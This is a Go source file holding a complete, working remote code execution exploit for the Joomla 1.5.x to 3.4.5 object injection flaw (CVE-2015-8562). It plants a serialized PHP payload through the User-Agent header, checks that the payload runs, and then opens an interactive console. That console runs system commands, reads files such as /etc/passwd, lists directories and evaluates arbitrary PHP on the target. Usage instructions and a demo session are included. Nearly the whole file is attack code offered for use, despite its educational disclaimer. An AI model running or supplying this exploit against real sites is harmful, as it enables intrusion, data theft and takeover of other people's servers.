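package main

/* **************************************************************************
 * Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
 * Exploit Author: Khashayar Fereidani ( http://fereidani.com )
 * Version: 1.5.x to 3.4.5
 * CVE : CVE-2015-8562
 **************************************************************************
 * THIS EXPLOIT IS PUBLISHED FOR EDUCATIONAL PURPOSES ONLY. ANY ILLEGAL USAGE
 * IS YOUR OWN RESPONSIBILITY. Run it only against systems you are authorised
 * to test: the "exec" and "eval" commands execute arbitrary code on the target.
 **************************************************************************
 * How to run : (you need the Go toolchain from golang.org)
 *   go run exploit.go http://target/path
 * or
 *   go build exploit.go
 *   ./exploit http://target/path
 **************************************************************************
 * DEMO :
 * $ ./exploit 192.168.1.113/joomla
 * ###############################################
 * # Joomla Remote Command Execution 0day Exploit
 * # Exploited by: Khashayar Fereidani
 * # http://fereidani.com
 * # Vulnerable Versions: 1.5.x to 3.4.5
 * ###############################################
 * Attacking to  http://FILTERED.TLD/joomla/
 * Target is vulnerable !
 * # Command Line Documentation :
 * read FILEPATH        read file from FILEPATH
 * dir DIRPATH          list directory in DIRPATH
 * exec COMMAND         execute system command
 * eval phpcode         evaluate PHP Code
 * help                 display this help
 * exit                 close exploit console
 * [*] Examples:
 * read /etc/passwd
 * dir /etc/
 * exec ls -lah
 * eval include('/etc/passwd')
 * root@joomla:$ exec uname -a
 * Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 * root@joomla:$
 ************************************************************************** */

import (
	"bufio"
	"bytes"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/http/cookiejar"
	"net/url"
	"os"
	"regexp"
	"strings"
	"time"
)

const banner = `###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.0 to 3.4.5
###############################################
`

const helpString = `# Command Line Documentation :
read FILEPATH        read file from FILEPATH
dir DIRPATH          list directory in DIRPATH
exec COMMAND         execute system command
eval phpcode         evaluate PHP Code
help                 display this help
exit                 close exploit console
[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')
`

// uaPayload is the serialized PHP object graph sent in the User-Agent header
// of every request. Inside it, SimplePie's cache_name_function is set to
// "assert", so its feed_url string is evaluated as PHP; that string eval()s
// $_POST[1] (the statement built by newRequest) and then calls exit;, which is
// why the response body after the marker is just the statement's output.
// The four trailing bytes are not valid UTF-8; they are presumably there to
// make the stored copy of the header get truncated at that point (see the
// CVE-2015-8562 write-ups) — confirm before changing them.
const uaPayload = `123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}` + "\xf0\xfd\xfd\xfd"

var (
	// target is the base URL of the Joomla install; set once in main and
	// normalised so it always carries a scheme and a trailing slash.
	target string

	// client keeps a cookie jar so the Joomla session cookie is reused
	// across requests; the payload only works across requests that share
	// the same server-side session.
	client *http.Client

	validHTTPURL = regexp.MustCompile(`^http[s]{0,1}://`)
	// resultRegex locates the marker the injected PHP echoes before running
	// the command; group 1 is everything the command printed after it.
	resultRegex = regexp.MustCompile(`(?sm)iMH3r3=(.*)`)
	// cmdRegex splits a console line into a verb and its argument.
	cmdRegex = regexp.MustCompile(`(\w+)\s(.+)`)
	newLine  = regexp.MustCompile(`[\n\r]`)
)

// newRequest builds the POST that carries one PHP statement to the target.
// The statement goes in form field "1", prefixed by an echo of the result
// marker; the User-Agent header carries the object-injection payload that
// eval()s that field. command may be empty (confirm uses that to probe).
// An error is returned only when target is not a usable URL.
func newRequest(command string) (*http.Request, error) {
	form := url.Values{}
	form.Set("1", "echo('iMH3r3=');"+command+";")
	req, err := http.NewRequest(http.MethodPost, target, bytes.NewBufferString(form.Encode()))
	if err != nil {
		return nil, err
	}
	req.Header.Set("User-Agent", uaPayload)
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	return req, nil
}

// escape makes s safe to embed inside a PHP single-quoted string literal.
// In such literals both backslash and single quote are escape-significant
// (`\\` -> `\`, `\'` -> `'`), so backslashes are doubled first and quotes are
// then prefixed; escaping only the quote would let a trailing backslash or a
// `\'` sequence in the argument break out of the literal.
func escape(s string) string {
	s = strings.Replace(s, `\`, `\\`, -1)
	return strings.Replace(s, "'", `\'`, -1)
}

// execPHP sends one PHP statement to the target and returns the text the page
// printed after the result marker, the HTTP status of the reply, and whether
// the marker was present at all (false means the injected code did not run).
// The response body is always drained and closed.
func execPHP(command string) (string, int, bool, error) {
	req, err := newRequest(command)
	if err != nil {
		return "", 0, false, err
	}
	res, err := client.Do(req)
	if err != nil {
		return "", 0, false, err
	}
	defer res.Body.Close()
	body, err := ioutil.ReadAll(res.Body)
	if err != nil {
		return "", res.StatusCode, false, err
	}
	m := resultRegex.FindSubmatch(body)
	if m == nil {
		return "", res.StatusCode, false, nil
	}
	return string(m[1]), res.StatusCode, true, nil
}

// runCommand executes command on the target and prints whatever it produced.
// Transport errors are printed; a reply without the marker prints nothing.
func runCommand(command string) {
	out, _, found, err := execPHP(command)
	if err != nil {
		fmt.Println(err)
		return
	}
	if found {
		fmt.Print(out)
	}
}

// confirm probes the target with an empty statement and reports whether the
// result marker came back, i.e. whether the injected PHP executed. A 500
// reply is reported with the original author's "patched PHP" message.
func confirm() bool {
	_, status, found, err := execPHP("")
	if err != nil {
		fmt.Println(err)
		return false
	}
	if status == 500 {
		fmt.Println("Patched PHP Version :( !")
		return false
	}
	return found
}

// normalizeTarget prefixes "http://" when the argument carries no scheme and
// appends a trailing slash so the POST goes to the site root that was given.
func normalizeTarget(arg string) string {
	if !validHTTPURL.MatchString(arg) {
		arg = "http://" + arg
	}
	if !strings.HasSuffix(arg, "/") {
		arg += "/"
	}
	return arg
}

// console runs the interactive read/dir/exec/eval loop until "exit" or until
// stdin is closed. Arguments of read/dir/exec are escaped into a PHP string
// literal; eval is passed through verbatim by design.
func console(in *bufio.Reader) {
	fmt.Println(helpString)
	for {
		fmt.Print("root@joomla:$ ")
		line, err := in.ReadString('\n')
		line = newLine.ReplaceAllString(line, "")
		if line == "" && err != nil {
			// stdin closed (e.g. piped input exhausted): stop instead of
			// spinning forever on empty reads.
			fmt.Println()
			return
		}
		m := cmdRegex.FindStringSubmatch(line)
		if len(m) < 3 {
			switch line {
			case "exit":
				return
			case "help":
			default:
				fmt.Println("Wrong input !")
			}
			fmt.Println(helpString)
			continue
		}
		verb, arg := m[1], m[2]
		switch verb {
		case "exec":
			runCommand("system('" + escape(arg) + "')")
		case "read":
			runCommand("readfile('" + escape(arg) + "')")
		case "dir":
			runCommand("$a=scandir('" + escape(arg) + "');foreach($a as $v){echo $v.\"\\n\";}")
		case "eval":
			runCommand(arg)
		default:
			fmt.Println("Wrong input !")
			fmt.Println(helpString)
		}
	}
}

// main parses the target from argv, plants and verifies the payload, and then
// hands control to the interactive console.
func main() {
	fmt.Print(banner)
	jar, err := cookiejar.New(nil)
	if err != nil {
		panic(err)
	}
	client = &http.Client{
		Jar: jar,
		// Never hang forever on a target that accepts the connection but
		// does not answer.
		Timeout: 30 * time.Second,
	}
	if len(os.Args) < 2 {
		fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/")
		return
	}
	target = normalizeTarget(os.Args[1])
	if _, err := url.ParseRequestURI(target); err != nil {
		fmt.Println("Invalid target URL:", err)
		return
	}
	fmt.Println("Attacking to ", target)
	// The first request only plants the payload (its reply is discarded);
	// confirm() then checks whether it executed on the follow-up request,
	// which reuses the session cookie stored in the jar.
	if _, _, _, err := execPHP(""); err != nil {
		fmt.Println("Request Error:", err)
		return
	}
	if !confirm() {
		fmt.Println("Target is not vulnerable!")
		return
	}
	fmt.Println("Target is vulnerable !")
	console(bufio.NewReader(os.Stdin))
}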